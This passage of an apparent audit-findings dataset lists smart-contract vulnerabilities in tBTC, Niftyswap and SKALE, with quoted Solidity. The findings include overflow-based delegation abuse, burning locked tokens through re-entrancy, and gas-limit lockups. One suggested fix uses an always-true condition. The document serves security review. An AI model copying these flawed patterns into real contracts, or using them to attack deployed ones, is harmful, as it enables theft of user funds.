days;\\n```\\n",Consider using the `constant` keyword.,,```\\nuint256 pausedDuration = 10 days;\\n```\\n +tbtc - Variable shadowing in TBTCDepositToken constructor,low,"`TBTCDepositToken` inherits from `DepositFactoryAuthority`, which has a single state variable, `_depositFactory`. This variable is shadowed in the `TBTCDepositToken` constructor.\\n```\\nconstructor(address \\_depositFactory)\\n ERC721Metadata(""tBTC Deopsit Token"", ""TDT"")\\n DepositFactoryAuthority(\\_depositFactory)\\npublic {\\n // solium-disable-previous-line no-empty-blocks\\n}\\n```\\n",Rename the parameter or state variable.,,"```\\nconstructor(address \\_depositFactory)\\n ERC721Metadata(""tBTC Deopsit Token"", ""TDT"")\\n DepositFactoryAuthority(\\_depositFactory)\\npublic {\\n // solium-disable-previous-line no-empty-blocks\\n}\\n```\\n" +Incorrect response from price feed if called during an onERC1155Received callback Acknowledged,medium,"The ERC 1155 standard requires that smart contracts must implement `onERC1155Received` and `onERC1155BatchReceived` to accept transfers.\\nThis means that on any token received, code run on the receiving smart contract.\\nIn `NiftyswapExchange` when adding / removing liquidity or buying tokens, the methods mentioned above are called when the tokens are sent. 
When this happens, the state of the contract is changed but not completed, the tokens are sent to the receiving smart contract but the state is not completely updated.\\nThis happens in these cases\\n`_baseToToken` (when buying tokens)\\n```\\n// // Refund Base Token if any\\nif (totalRefundBaseTokens > 0) {\\n baseToken.safeTransferFrom(address(this), \\_recipient, baseTokenID, totalRefundBaseTokens, """");\\n}\\n\\n// Send Tokens all tokens purchased\\ntoken.safeBatchTransferFrom(address(this), \\_recipient, \\_tokenIds, \\_tokensBoughtAmounts, """");\\n```\\n\\n`_removeLiquidity`\\n```\\n// Transfer total Base Tokens and all Tokens ids\\nbaseToken.safeTransferFrom(address(this), \\_provider, baseTokenID, totalBaseTokens, """");\\ntoken.safeBatchTransferFrom(address(this), \\_provider, \\_tokenIds, tokenAmounts, """");\\n```\\n\\n`_addLiquidity`\\n```\\n// Mint liquidity pool tokens\\n\\_batchMint(\\_provider, \\_tokenIds, liquiditiesToMint, """");\\n\\n// Transfer all Base Tokens to this contract\\nbaseToken.safeTransferFrom(\\_provider, address(this), baseTokenID, totalBaseTokens, abi.encode(DEPOSIT\\_SIG));\\n```\\n\\nEach of these examples send some tokens to the smart contract, which triggers calling some code on the receiving smart contract.\\nWhile these methods have the `nonReentrant` modifier which protects them from re-netrancy, the result of the methods `getPrice_baseToToken` and `getPrice_tokenToBase` is affected. These 2 methods do not have the `nonReentrant` modifier.\\nThe price reported by the `getPrice_baseToToken` and `getPrice_tokenToBase` methods is incorrect (until after the end of the transaction) because they rely on the number of tokens owned by the NiftyswapExchange; which between the calls is not finalized. 
Hence the price reported will be incorrect.\\nThis gives the smart contract which receives the tokens, the opportunity to use other systems (if they exist) that rely on the result of `getPrice_baseToToken` and `getPrice_tokenToBase` to use the returned price to its advantage.\\nIt's important to note that this is a bug only if other systems rely on the price reported by this `NiftyswapExchange`. Also the current contract is not affected, nor its balances or internal ledger, only other systems relying on its reported price will be fooled.","Resolution\\nThe design will not be modified. Horizon Games should clearly document this risk for 3rd parties seeking to use Niftyswap as a price feed.\\nBecause there is no way to enforce how other systems work, a restriction can be added on `NiftyswapExchange` to protect other systems (if any) that rely on `NiftyswapExchange` for price discovery.\\nAdding a `nonReentrant` modifier on the view methods `getPrice_baseToToken` and `getPrice_tokenToBase` will add a bit of protection for the ecosystem.",,"```\\n// // Refund Base Token if any\\nif (totalRefundBaseTokens > 0) {\\n baseToken.safeTransferFrom(address(this), \\_recipient, baseTokenID, totalRefundBaseTokens, """");\\n}\\n\\n// Send Tokens all tokens purchased\\ntoken.safeBatchTransferFrom(address(this), \\_recipient, \\_tokenIds, \\_tokensBoughtAmounts, """");\\n```\\n" +Ether send function remainder handling,low,"The Ether send function depicted below implements logic to reimburse the sender if an extraneous amount is left in the contract after the disbursement.\\n```\\nfunction sendEth(address payable [] memory \\_to, uint256[] memory \\_value) public restrictedToOwner payable returns (bool \\_success) {\\n // input validation\\n require(\\_to.length == \\_value.length);\\n require(\\_to.length <= 255);\\n\\n // count values for refunding sender\\n uint256 beforeValue = msg.value;\\n uint256 afterValue = 0;\\n\\n // loop through to addresses and send value\\n for (uint8 
i = 0; i < \\_to.length; i++) {\\n afterValue = afterValue.add(\\_value[i]);\\n assert(\\_to[i].send(\\_value[i]));\\n }\\n\\n // send back remaining value to sender\\n uint256 remainingValue = beforeValue.sub(afterValue);\\n if (remainingValue > 0) {\\n assert(msg.sender.send(remainingValue));\\n }\\n return true;\\n}\\n```\\n\\nIt is also the only place where the `SafeMath` dependency is being used. More specifically to check there was no underflow in the arithmetic adding up the disbursed amounts.\\nHowever, since the individual sends would revert themselves should more Ether than what was available in the balance be specified these protection measures seem unnecessary.\\nNot only the above is true but the current codebase does not allow to take funds locked within the contract out in the off chance someone forced funds into this smart contract (e.g., by self-destructing some other smart contract containing funds into this one).","The easiest way to handle both retiring `SafeMath` and returning locked funds would be to phase out all the intra-function arithmetic and just transferring `address(this).balance` to `msg.sender` at the end of the disbursement. 
Since all the funds in there are meant to be from the caller of the function this serves the purpose of returning extraneous funds to him well and, adding to that, it allows for some front-running fun if someone “self-destructed” funds to this smart contract by mistake.",,"```\\nfunction sendEth(address payable [] memory \\_to, uint256[] memory \\_value) public restrictedToOwner payable returns (bool \\_success) {\\n // input validation\\n require(\\_to.length == \\_value.length);\\n require(\\_to.length <= 255);\\n\\n // count values for refunding sender\\n uint256 beforeValue = msg.value;\\n uint256 afterValue = 0;\\n\\n // loop through to addresses and send value\\n for (uint8 i = 0; i < \\_to.length; i++) {\\n afterValue = afterValue.add(\\_value[i]);\\n assert(\\_to[i].send(\\_value[i]));\\n }\\n\\n // send back remaining value to sender\\n uint256 remainingValue = beforeValue.sub(afterValue);\\n if (remainingValue > 0) {\\n assert(msg.sender.send(remainingValue));\\n }\\n return true;\\n}\\n```\\n" +Unneeded type cast of contract type,low,The typecast being done on the `address` parameter in the lien below is unneeded.\\n```\\nERC20 token = ERC20(\\_tokenAddress);\\n```\\n,"Assign the right type at the function parameter definition like so:\\n```\\n function sendErc20(ERC20 _tokenAddress, address[] memory _to, uint256[] memory _value) public restrictedToOwner returns (bool _success) {\\n```\\n",,```\\nERC20 token = ERC20(\\_tokenAddress);\\n```\\n +Inadequate use of assert,low,"The usage of `require` vs `assert` has always been a matter of discussion because of the fine lines distinguishing these transaction-terminating expressions.\\nHowever, the usage of the `assert` syntax in this case is not the most appropriate.\\nBorrowing the explanation from the latest solidity docs (v. https://solidity.readthedocs.io/en/latest/control-structures.html#id4) :\\n```\\nThe assert function should only be used to test for internal errors, and to check invariants. 
\\n```\\n\\nSince assert-style exceptions (using the `0xfe` opcode) consume all gas available to the call and require-style ones (using the `0xfd` opcode) do not since the Metropolis release when the `REVERT` instruction was added, the usage of `require` in the lines depicted in the examples section would only result in gas savings and the same security assumptions.\\nIn this case, even though the calls are being made to external contracts the supposedly abide to a predefined specification, this is by no means an invariant of the presented system since the component is external to the built system and its integrity cannot be formally verified.\\n```\\nassert(\\_to[i].send(\\_value[i]));\\n```\\n\\n```\\nassert(msg.sender.send(remainingValue));\\n```\\n\\n```\\nassert(token.transferFrom(msg.sender, \\_to[i], \\_value[i]) == true);\\n```\\n",Exchange the `assert` statements for `require` ones.,,"```\\nThe assert function should only be used to test for internal errors, and to check invariants. \\n```\\n" +uint overflow may lead to stealing funds,high,"It's possible to create a delegation with a very huge amount which may result in a lot of critically bad malicious usages:\\n```\\nuint holderBalance = SkaleToken(contractManager.getContract(""SkaleToken"")).balanceOf(holder);\\nuint lockedToDelegate = tokenState.getLockedCount(holder) - tokenState.getPurchasedAmount(holder);\\nrequire(holderBalance >= amount + lockedToDelegate, ""Delegator hasn't enough tokens to delegate"");\\n```\\n\\n`amount` is passed by a user as a parameter, so if it's close to `uint` max value, `amount` + lockedToDelegate would overflow and this requirement would pass.\\nHaving delegation with an almost infinite amount of tokens can lead to many various attacks on the system up to stealing funds and breaking everything.","Using `SafeMath` everywhere should prevent this and other similar issues. 
There should be more critical attacks caused by overflows/underflows, so `SafeMath` should be used everywhere in the codebase.",,"```\\nuint holderBalance = SkaleToken(contractManager.getContract(""SkaleToken"")).balanceOf(holder);\\nuint lockedToDelegate = tokenState.getLockedCount(holder) - tokenState.getPurchasedAmount(holder);\\nrequire(holderBalance >= amount + lockedToDelegate, ""Delegator hasn't enough tokens to delegate"");\\n```\\n" +Holders can burn locked funds,high,"Skale token is a modified ERC-777 that allows locking some part of the balance. Locking is checked during every transfer:\\n```\\n// Property of the company SKALE Labs inc.---------------------------------\\n uint locked = \\_getLockedOf(from);\\n if (locked > 0) {\\n require(\\_balances[from] >= locked + amount, ""Token should be unlocked for transferring"");\\n }\\n//-------------------------------------------------------------------------\\n \\_balances[from] = \\_balances[from].sub(amount);\\n \\_balances[to] = \\_balances[to].add(amount);\\n```\\n\\nBut it's not checked during `burn` function and it's possible to “burn” `locked` tokens. Tokens will be burned, but `locked` amount will remain the same. 
That will result in having more `locked` tokens than the balance which may have very unpredictable behaviour.",Allow burning only unlocked tokens.,,"```\\n// Property of the company SKALE Labs inc.---------------------------------\\n uint locked = \\_getLockedOf(from);\\n if (locked > 0) {\\n require(\\_balances[from] >= locked + amount, ""Token should be unlocked for transferring"");\\n }\\n//-------------------------------------------------------------------------\\n \\_balances[from] = \\_balances[from].sub(amount);\\n \\_balances[to] = \\_balances[to].add(amount);\\n```\\n" +Node can unlink validator,high,"Validators can link a node address to them by calling `linkNodeAddress` function:\\n```\\nfunction linkNodeAddress(address validatorAddress, address nodeAddress) external allow(""DelegationService"") {\\n uint validatorId = getValidatorId(validatorAddress);\\n require(\\_validatorAddressToId[nodeAddress] == 0, ""Validator cannot override node address"");\\n \\_validatorAddressToId[nodeAddress] = validatorId;\\n}\\n\\nfunction unlinkNodeAddress(address validatorAddress, address nodeAddress) external allow(""DelegationService"") {\\n uint validatorId = getValidatorId(validatorAddress);\\n require(\\_validatorAddressToId[nodeAddress] == validatorId, ""Validator hasn't permissions to unlink node"");\\n \\_validatorAddressToId[nodeAddress] = 0;\\n}\\n```\\n\\nAfter that, the node has the same rights and is almost indistinguishable from the validator. So the node can even remove validator's address from `_validatorAddressToId` list and take over full control over validator. 
Additionally, the node can even remove itself by calling `unlinkNodeAddress`, leaving validator with no control at all forever.\\nAlso, even without nodes, a validator can initially call `unlinkNodeAddress` to remove itself.",Linked nodes (and validator) should not be able to unlink validator's address from the `_validatorAddressToId` mapping.,,"```\\nfunction linkNodeAddress(address validatorAddress, address nodeAddress) external allow(""DelegationService"") {\\n uint validatorId = getValidatorId(validatorAddress);\\n require(\\_validatorAddressToId[nodeAddress] == 0, ""Validator cannot override node address"");\\n \\_validatorAddressToId[nodeAddress] = validatorId;\\n}\\n\\nfunction unlinkNodeAddress(address validatorAddress, address nodeAddress) external allow(""DelegationService"") {\\n uint validatorId = getValidatorId(validatorAddress);\\n require(\\_validatorAddressToId[nodeAddress] == validatorId, ""Validator hasn't permissions to unlink node"");\\n \\_validatorAddressToId[nodeAddress] = 0;\\n}\\n```\\n" +Unlocking funds after slashing,high,"The initial funds can be unlocked if 51+% of them are delegated. 
However if any portion of the funds are slashed, the rest of the funds will not be unlocked at the end of the delegation period.\\n```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n```\\n","Consider slashed tokens as delegated, or include them in the calculation for process to unlock in `endingDelegatedToUnlocked`",,```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n```\\n +Bounties and fees should only be locked for the first 3 months,high,"Bounties are currently locked for the first 3 months after delegation:\\n```\\nskaleBalances.lockBounty(shares[i].holder, timeHelpers.addMonths(delegationStarted, 3));\\n```\\n\\nInstead, they should be locked for the first 3 months after the token launch.","It's better just to forbid any withdrawals for the first 3 months, no need to track it separately for every delegation. 
This recommendation is mainly to simplify the process.",,"```\\nskaleBalances.lockBounty(shares[i].holder, timeHelpers.addMonths(delegationStarted, 3));\\n```\\n" +getLockedCount is iterating over all history of delegations,high,"`getLockedCount` is iterating over all delegations of a specific holder and may even change the state of these delegations by calling `getState`.\\n```\\nfunction getLockedCount(address holder) external returns (uint amount) {\\n amount = 0;\\n DelegationController delegationController = DelegationController(contractManager.getContract(""DelegationController""));\\n uint[] memory delegationIds = delegationController.getDelegationsByHolder(holder);\\n for (uint i = 0; i < delegationIds.length; ++i) {\\n uint id = delegationIds[i];\\n if (isLocked(getState(id))) {\\n amount += delegationController.getDelegation(id).amount;\\n }\\n }\\n return amount + getPurchasedAmount(holder) + this.getSlashedAmount(holder);\\n}\\n```\\n\\nThis problem is major because delegations number is growing over time and may even potentially grow more than the gas limit and lock all tokens forever. `getLockedCount` is called during every transfer which makes any token transfer much more expensive than it should be.",Remove iterations over a potentially unlimited amount of tokens. 
All the necessary data can be precalculated before and `getLockedCount` function can have O(1) complexity.,,"```\\nfunction getLockedCount(address holder) external returns (uint amount) {\\n amount = 0;\\n DelegationController delegationController = DelegationController(contractManager.getContract(""DelegationController""));\\n uint[] memory delegationIds = delegationController.getDelegationsByHolder(holder);\\n for (uint i = 0; i < delegationIds.length; ++i) {\\n uint id = delegationIds[i];\\n if (isLocked(getState(id))) {\\n amount += delegationController.getDelegation(id).amount;\\n }\\n }\\n return amount + getPurchasedAmount(holder) + this.getSlashedAmount(holder);\\n}\\n```\\n" +Tokens are unlocked only when delegation ends,high,"After the first 3 months since at least 50% of tokens are delegated, all tokens should be unlocked. In practice, they are only unlocked if at least 50% of tokens, that were bought on the initial launch, are undelegated.\\n```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n}\\n```\\n",Implement lock mechanism according to the legal requirement.,,```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n}\\n```\\n +Tokens after delegation should not be unlocked automatically,high,"When some amount of tokens are delegated to a validator when the delegation period ends, these tokens are unlocked. 
However these tokens should be added to `_purchased` as they were in that state before their delegation.\\n```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n}\\n```\\n","Tokens should only be unlocked if the main legal requirement `(_totalDelegated[holder] >= _purchased[holder])` is satisfied, which in the above case this has not happened.",,```\\nif (\\_isPurchased[delegationId]) {\\n address holder = delegation.holder;\\n \\_totalDelegated[holder] += delegation.amount;\\n if (\\_totalDelegated[holder] >= \\_purchased[holder]) {\\n purchasedToUnlocked(holder);\\n }\\n}\\n```\\n +Some unlocked tokens can become locked after delegation is rejected,high,"When some amount of tokens are requested to be delegated to a validator, the validator can reject the request. The previous status of these tokens should be intact and not changed (locked or unlocked).\\nHere the initial status of tokens gets stored and it's either completely `locked` or unlocked:\\n```\\nif (\\_purchased[delegation.holder] > 0) {\\n \\_isPurchased[delegationId] = true;\\n if (\\_purchased[delegation.holder] > delegation.amount) {\\n \\_purchased[delegation.holder] -= delegation.amount;\\n } else {\\n \\_purchased[delegation.holder] = 0;\\n }\\n} else {\\n \\_isPurchased[delegationId] = false;\\n}\\n```\\n\\nThe problem is that if some amount of these tokens are locked at the time of the request and the rest tokens are unlocked, they will all be considered as locked after the delegation was rejected.\\n```\\nfunction \\_cancel(uint delegationId, DelegationController.Delegation memory delegation) internal returns (State state) {\\n if (\\_isPurchased[delegationId]) {\\n state = purchasedProposedToPurchased(delegationId, delegation);\\n } else {\\n state = proposedToUnlocked(delegationId);\\n }\\n}\\n```\\n",Don't change the 
status of the rejected tokens.,,```\\nif (\\_purchased[delegation.holder] > 0) {\\n \\_isPurchased[delegationId] = true;\\n if (\\_purchased[delegation.holder] > delegation.amount) {\\n \\_purchased[delegation.holder] -= delegation.amount;\\n } else {\\n \\_purchased[delegation.holder] = 0;\\n }\\n} else {\\n \\_isPurchased[delegationId] = false;\\n}\\n```\\n +Gas limit for bounty and slashing distribution,high,"After every bounty payment (should be once per month) to a validator, the bounty is distributed to all delegators. In order to do that, there is a `for` loop that iterates over all active delegators and sends their bounty to `SkaleBalances` contract:\\n```\\nfor (uint i = 0; i < shares.length; ++i) {\\n skaleToken.send(address(skaleBalances), shares[i].amount, abi.encode(shares[i].holder));\\n\\n uint created = delegationController.getDelegation(shares[i].delegationId).created;\\n uint delegationStarted = timeHelpers.getNextMonthStartFromDate(created);\\n skaleBalances.lockBounty(shares[i].holder, timeHelpers.addMonths(delegationStarted, 3));\\n}\\n```\\n\\nThere are also few more loops over all the active delegators. This leads to a huge gas cost of distribution mechanism. 
A number of active delegators that can be processed before hitting the gas limit is limited and not big enough.\\nThe same issue is with slashing:\\n```\\nfunction slash(uint validatorId, uint amount) external allow(""SkaleDKG"") {\\n ValidatorService validatorService = ValidatorService(contractManager.getContract(""ValidatorService""));\\n require(validatorService.validatorExists(validatorId), ""Validator does not exist"");\\n\\n Distributor distributor = Distributor(contractManager.getContract(""Distributor""));\\n TokenState tokenState = TokenState(contractManager.getContract(""TokenState""));\\n\\n Distributor.Share[] memory shares = distributor.distributePenalties(validatorId, amount);\\n for (uint i = 0; i < shares.length; ++i) {\\n tokenState.slash(shares[i].delegationId, shares[i].amount);\\n }\\n}\\n```\\n","The best solution would require major changes to the codebase, but would eventually make it simpler and safer. Instead of distributing and centrally calculating bounty for each delegator during one call it's better to just store all the necessary values, so delegator would be able to calculate the bounty on withdrawal. 
Amongst the necessary values, there should be history of total delegated amounts per validator during each bounty payment and history of all delegations with durations of their active state.",,"```\\nfor (uint i = 0; i < shares.length; ++i) {\\n skaleToken.send(address(skaleBalances), shares[i].amount, abi.encode(shares[i].holder));\\n\\n uint created = delegationController.getDelegation(shares[i].delegationId).created;\\n uint delegationStarted = timeHelpers.getNextMonthStartFromDate(created);\\n skaleBalances.lockBounty(shares[i].holder, timeHelpers.addMonths(delegationStarted, 3));\\n}\\n```\\n" +Delegations might stuck in non-active validator Pending,medium,"If a validator does not get enough funds to run a node (MSR - Minimum staking requirement), all token holders that delegated tokens to the validator cannot switch to a different validator, and might result in funds getting stuck with the nonfunctioning validator for up to 12 months.\\nExample\\n```\\nrequire((validatorNodes.length + 1) \\* msr <= delegationsTotal, ""Validator has to meet Minimum Staking Requirement"");\\n```\\n",Resolution\\nSkale team acknowledged this issue and will address this in future versions.\\nAllow token holders to withdraw delegation earlier if the validator didn't get enough funds for running nodes.,,"```\\nrequire((validatorNodes.length + 1) \\* msr <= delegationsTotal, ""Validator has to meet Minimum Staking Requirement"");\\n```\\n" +Disabled Validators still have delegated funds Pending,medium,"The owner of `ValidatorService` contract can enable and disable validators. 
The issue is that when a validator is disabled, it still has its delegations, and delegated funds will be locked until the end of their delegation period (up to 12 months).\\n```\\nfunction enableValidator(uint validatorId) external checkValidatorExists(validatorId) onlyOwner {\\n trustedValidators[validatorId] = true;\\n}\\n\\nfunction disableValidator(uint validatorId) external checkValidatorExists(validatorId) onlyOwner {\\n trustedValidators[validatorId] = false;\\n}\\n```\\n","It might make sense to release all delegations and stop validator's nodes if it's not trusted anymore. However, the rationale behind disabling the validators might be different that what we think, in any case there should be a way to handle this scenario, where the validator is disabled but there are funds delegated to it.",,```\\nfunction enableValidator(uint validatorId) external checkValidatorExists(validatorId) onlyOwner {\\n trustedValidators[validatorId] = true;\\n}\\n\\nfunction disableValidator(uint validatorId) external checkValidatorExists(validatorId) onlyOwner {\\n trustedValidators[validatorId] = false;\\n}\\n```\\n +_endingDelegations list is redundant,medium,"`_endingDelegations` is a list of delegations that is created for optimisation purposes. 
But the only place it's used is in `getPurchasedAmount` function, so only a subset of all delegations is going to be updated.\\n```\\nfunction getPurchasedAmount(address holder) public returns (uint amount) {\\n // check if any delegation was ended\\n for (uint i = 0; i < \\_endingDelegations[holder].length; ++i) {\\n getState(\\_endingDelegations[holder][i]);\\n }\\n return \\_purchased[holder];\\n```\\n\\nBut `getPurchasedAmount` function is mostly used after iterating over all delegations of the holder.",Resolution\\nIssue is fixed as a part of the major code changes in skalenetwork/skale-manager#92\\nRemove `_endingDelegations` and switch to a mechanism that does not require looping through delegations list of potentially unlimited size.,,```\\nfunction getPurchasedAmount(address holder) public returns (uint amount) {\\n // check if any delegation was ended\\n for (uint i = 0; i < \\_endingDelegations[holder].length; ++i) {\\n getState(\\_endingDelegations[holder][i]);\\n }\\n return \\_purchased[holder];\\n```\\n +Some functions are defined but not implemented,medium,"There are many functions that are defined but not implemented. They have a revert with a message as not implemented.\\nThis results in complex code and reduces readability. Here are some of these functions within the scope of this audit:\\n```\\nfunction getAllDelegationRequests() external returns(uint[] memory) {\\n revert(""Not implemented"");\\n}\\n\\nfunction getDelegationRequestsForValidator(uint validatorId) external returns (uint[] memory) {\\n revert(""Not implemented"");\\n}\\n```\\n","If these functions are needed for this release, they must be implemented. 
If they are for future plans, it's better to remove the extra code in the smart contracts.",,"```\\nfunction getAllDelegationRequests() external returns(uint[] memory) {\\n revert(""Not implemented"");\\n}\\n\\nfunction getDelegationRequestsForValidator(uint validatorId) external returns (uint[] memory) {\\n revert(""Not implemented"");\\n}\\n```\\n" +tokenState.setState redundant checks,medium,"`tokenState.setState` is used to change the state of the token from:\\nPROPOSED to ACCEPTED (in accept())\\nDELEGATED to ENDING_DELEGATED (in `requestUndelegation()`)\\nThe if/else statement in `setState` is too complicated and can be simplified, both to optimize gas usage and to increase readability.\\n```\\nfunction setState(uint delegationId, State newState) internal {\\n TimeHelpers timeHelpers = TimeHelpers(contractManager.getContract(""TimeHelpers""));\\n DelegationController delegationController = DelegationController(contractManager.getContract(""DelegationController""));\\n\\n require(newState != State.PROPOSED, ""Can't set state to proposed"");\\n\\n if (newState == State.ACCEPTED) {\\n State currentState = getState(delegationId);\\n require(currentState == State.PROPOSED, ""Can't set state to accepted"");\\n\\n \\_state[delegationId] = State.ACCEPTED;\\n \\_timelimit[delegationId] = timeHelpers.getNextMonthStart();\\n } else if (newState == State.DELEGATED) {\\n revert(""Can't set state to delegated"");\\n } else if (newState == State.ENDING\\_DELEGATED) {\\n require(getState(delegationId) == State.DELEGATED, ""Can't set state to ending delegated"");\\n DelegationController.Delegation memory delegation = delegationController.getDelegation(delegationId);\\n\\n \\_state[delegationId] = State.ENDING\\_DELEGATED;\\n \\_timelimit[delegationId] = timeHelpers.calculateDelegationEndTime(delegation.created, delegation.delegationPeriod, 3);\\n \\_endingDelegations[delegation.holder].push(delegationId);\\n } else {\\n revert(""Unknown state"");\\n }\\n}\\n```\\n","Some of the 
changes that do not change the functionality of the `setState` function:\\nRemove `reverts()` and add the valid states to the `require()` at the beginning of the function\\nRemove multiple calls to `getState()`\\nRemove final else/revert as this is an internal function and States passed should be valid More optimization can be done which requires further understanding of the system and the state machine.\\n```\\nfunction setState(uint delegationId, State newState) internal {\\n TimeHelpers timeHelpers = TimeHelpers(contractManager.getContract(""TimeHelpers""));\\n DelegationController delegationController = DelegationController(contractManager.getContract(""DelegationController""));\\n\\n require(newState != State.PROPOSED || newState != State.DELEGATED, ""Invalid state change"");\\n State currentState = getState(delegationId);\\n\\n if (newState == State.ACCEPTED) {\\n require(currentState == State.PROPOSED, ""Can't set state to accepted"");\\n\\n \\_state[delegationId] = State.ACCEPTED;\\n \\_timelimit[delegationId] = timeHelpers.getNextMonthStart();\\n } else if (newState == State.ENDING\\_DELEGATED) {\\n require(currentState == State.DELEGATED, ""Can't set state to ending delegated"");\\n DelegationController.Delegation memory delegation = delegationController.getDelegation(delegationId);\\n\\n \\_state[delegationId] = State.ENDING\\_DELEGATED;\\n \\_timelimit[delegationId] = timeHelpers.calculateDelegationEndTime(delegation.created, delegation.delegationPeriod, 3);\\n \\_endingDelegations[delegation.holder].push(delegationId);\\n }\\n }\\n```\\n",,"```\\nfunction setState(uint delegationId, State newState) internal {\\n TimeHelpers timeHelpers = TimeHelpers(contractManager.getContract(""TimeHelpers""));\\n DelegationController delegationController = DelegationController(contractManager.getContract(""DelegationController""));\\n\\n require(newState != State.PROPOSED, ""Can't set state to proposed"");\\n\\n if (newState == State.ACCEPTED) {\\n State currentState 
= getState(delegationId);\\n require(currentState == State.PROPOSED, ""Can't set state to accepted"");\\n\\n \\_state[delegationId] = State.ACCEPTED;\\n \\_timelimit[delegationId] = timeHelpers.getNextMonthStart();\\n } else if (newState == State.DELEGATED) {\\n revert(""Can't set state to delegated"");\\n } else if (newState == State.ENDING\\_DELEGATED) {\\n require(getState(delegationId) == State.DELEGATED, ""Can't set state to ending delegated"");\\n DelegationController.Delegation memory delegation = delegationController.getDelegation(delegationId);\\n\\n \\_state[delegationId] = State.ENDING\\_DELEGATED;\\n \\_timelimit[delegationId] = timeHelpers.calculateDelegationEndTime(delegation.created, delegation.delegationPeriod, 3);\\n \\_endingDelegations[delegation.holder].push(delegationId);\\n } else {\\n revert(""Unknown state"");\\n }\\n}\\n```\\n" +Users can burn delegated tokens using re-entrancy attack,high,"When a user burns tokens, the following code is called:\\n```\\n uint locked = \\_getAndUpdateLockedAmount(from);\\n if (locked > 0) {\\n require(\\_balances[from] >= locked.add(amount), ""Token should be unlocked for burning"");\\n }\\n//-------------------------------------------------------------------------\\n\\n \\_callTokensToSend(\\n operator, from, address(0), amount, data, operatorData\\n );\\n\\n // Update state variables\\n \\_totalSupply = \\_totalSupply.sub(amount);\\n \\_balances[from] = \\_balances[from].sub(amount);\\n```\\n\\nThere is a callback function right after the check that there are enough unlocked tokens to burn. 
In this callback, the user can delegate all the tokens right before burning them without breaking the code flow.","Resolution\\nMitigated in skalenetwork/skale-manager#128\\n`_callTokensToSend` should be called before checking for the unlocked amount of tokens, which is better defined as Checks-Effects-Interactions Pattern.",,"```\\n uint locked = \\_getAndUpdateLockedAmount(from);\\n if (locked > 0) {\\n require(\\_balances[from] >= locked.add(amount), ""Token should be unlocked for burning"");\\n }\\n//-------------------------------------------------------------------------\\n\\n \\_callTokensToSend(\\n operator, from, address(0), amount, data, operatorData\\n );\\n\\n // Update state variables\\n \\_totalSupply = \\_totalSupply.sub(amount);\\n \\_balances[from] = \\_balances[from].sub(amount);\\n```\\n" +Rounding errors after slashing,high,"When slashing happens `_delegatedToValidator` and `_effectiveDelegatedToValidator` values are reduced.\\n```\\nfunction confiscate(uint validatorId, uint amount) external {\\n uint currentMonth = getCurrentMonth();\\n Fraction memory coefficient = reduce(\\_delegatedToValidator[validatorId], amount, currentMonth);\\n reduce(\\_effectiveDelegatedToValidator[validatorId], coefficient, currentMonth);\\n putToSlashingLog(\\_slashesOfValidator[validatorId], coefficient, currentMonth);\\n \\_slashes.push(SlashingEvent({reducingCoefficient: coefficient, validatorId: validatorId, month: currentMonth}));\\n}\\n```\\n\\nWhen holders process slashings, they reduce `_delegatedByHolderToValidator`, `_delegatedByHolder`, `_effectiveDelegatedByHolderToValidator` values.\\n```\\nif (oldValue > 0) {\\n reduce(\\n \\_delegatedByHolderToValidator[holder][validatorId],\\n \\_delegatedByHolder[holder],\\n \\_slashes[index].reducingCoefficient,\\n month);\\n reduce(\\n \\_effectiveDelegatedByHolderToValidator[holder][validatorId],\\n \\_slashes[index].reducingCoefficient,\\n month);\\n slashingSignals[index.sub(begin)].holder = holder;\\n 
slashingSignals[index.sub(begin)].penalty = oldValue.sub(getAndUpdateDelegatedByHolderToValidator(holder, validatorId, month));\\n}\\n```\\n\\nAlso when holders are undelegating, they are calculating how many tokens from `delegations[delegationId].amount` were slashed.\\n```\\nuint amountAfterSlashing = calculateDelegationAmountAfterSlashing(delegationId);\\n```\\n\\nAll these values should be calculated one from another, but they all will have different rounding errors after slashing. For example, the assumptions that the total sum of all delegations from holder `X` to validator `Y` should still be equal to `_delegatedByHolderToValidator[X][Y]` is not true anymore. The problem is that these assumptions are still used. For example, when undelegating some delegation with delegated `amount` equals amount(after slashing), the holder will reduce `_delegatedByHolderToValidator[X][Y]`, `_delegatedByHolder[X]` and `_delegatedToValidator[Y]` by `amount`. Since rounding errors of all these values are different that will lead to 2 possible scenarios:\\nIf rounding error reduces `amount` not that much as other values, we can have `uint` underflow. This is especially dangerous because all calculations are delayed and we will know about underflow and `SafeMath` revert in the next month or later.\\nDevelopers already made sure that rounding errors are aligned in a correct way, and that the reduced value should always be larger than the subtracted, so there should not be underflow. This solution is very unstable because it's hard to verify it and keep in mind even during a small code change. 2. If rounding errors make `amount` smaller then it should be, when other values should be zero (for example, when all the delegations are undelegated), these values will become some very small values. 
